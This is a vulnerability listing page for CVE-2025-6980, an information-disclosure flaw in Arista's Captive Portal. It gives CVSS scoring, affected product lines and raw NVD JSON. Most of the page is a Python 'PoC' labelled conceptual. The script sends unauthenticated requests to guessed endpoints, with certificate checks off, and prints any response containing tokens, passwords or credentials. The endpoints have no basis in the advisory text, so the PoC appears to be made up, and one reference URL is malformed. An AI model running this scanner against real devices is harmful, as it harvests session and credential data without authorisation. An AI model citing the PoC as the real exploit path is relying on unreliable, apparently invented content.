Security Vulnerability Report
CVE-2025-6980 CVSS 7.5 HIGH

CVE-2025-6980

Published: 2025-10-23 19:15:52
Last Modified: 2026-04-15 00:35:42

Description

Captive Portal can expose sensitive information

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Arista EOS Captive Portal (see the official security advisory for specific versions)
Arista Wireless product line versions with Captive Portal enabled
Arista switch product versions with Captive Portal enabled

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-6980 PoC - Arista Captive Portal Information Disclosure
# This is a conceptual PoC demonstrating the attack vector
# Use only for authorized security testing

import requests
import sys


def check_vulnerability(target_url):
    """Check if target is vulnerable to CVE-2025-6980"""
    # Common Captive Portal endpoints
    endpoints = [
        "/captive-portal/api/user/status",
        "/captive-portal/api/session/info",
        "/api/captive-portal/user",
        "/captiveportal/userinfo",
        "/hotspot/login"
    ]

    vulnerable = False
    leaked_data = []

    for endpoint in endpoints:
        try:
            # Attempt to access sensitive endpoint without authentication
            url = target_url.rstrip('/') + endpoint
            response = requests.get(url, timeout=10, verify=False)

            # Check for sensitive information in response
            if response.status_code == 200:
                # Look for indicators of sensitive data exposure
                sensitive_keywords = [
                    'session', 'token', 'secret', 'password',
                    'key', 'credential', 'auth', 'user_data'
                ]
                response_text = response.text.lower()
                for keyword in sensitive_keywords:
                    if keyword in response_text:
                        vulnerable = True
                        leaked_data.append({
                            'endpoint': endpoint,
                            'status_code': response.status_code,
                            'data_preview': response.text[:500]
                        })
                        break
        except requests.exceptions.RequestException as e:
            print(f"[-] Error accessing {endpoint}: {e}")

    return vulnerable, leaked_data


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-6980-poc.py <target_url>")
        print("Example: python cve-2025-6980-poc.py https://192.168.1.1")
        sys.exit(1)

    target = sys.argv[1]
    print(f"[*] Testing target: {target}")
    print(f"[*] Checking for CVE-2025-6980 vulnerability...\n")

    is_vulnerable, data = check_vulnerability(target)

    if is_vulnerable:
        print("[!] Target is VULNERABLE to CVE-2025-6980")
        print(f"[!] Found {len(data)} potentially vulnerable endpoints")
        for item in data:
            print(f"\n[+] Endpoint: {item['endpoint']}")
            print(f"    Status: {item['status_code']}")
            print(f"    Data Preview: {item['data_preview']}...")
    else:
        print("[-] Target appears to be NOT vulnerable")

    print("\n[*] Note: This PoC is for authorized testing only")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-6980", "sourceIdentifier": "[email protected]", "published": "2025-10-23T19:15:51.667", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Captive Portal can expose sensitive information"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://https://www.arista.com/en/support/advisories-notices/security-advisory/22535-security-advisory-0123", "source": "[email protected]"}]}}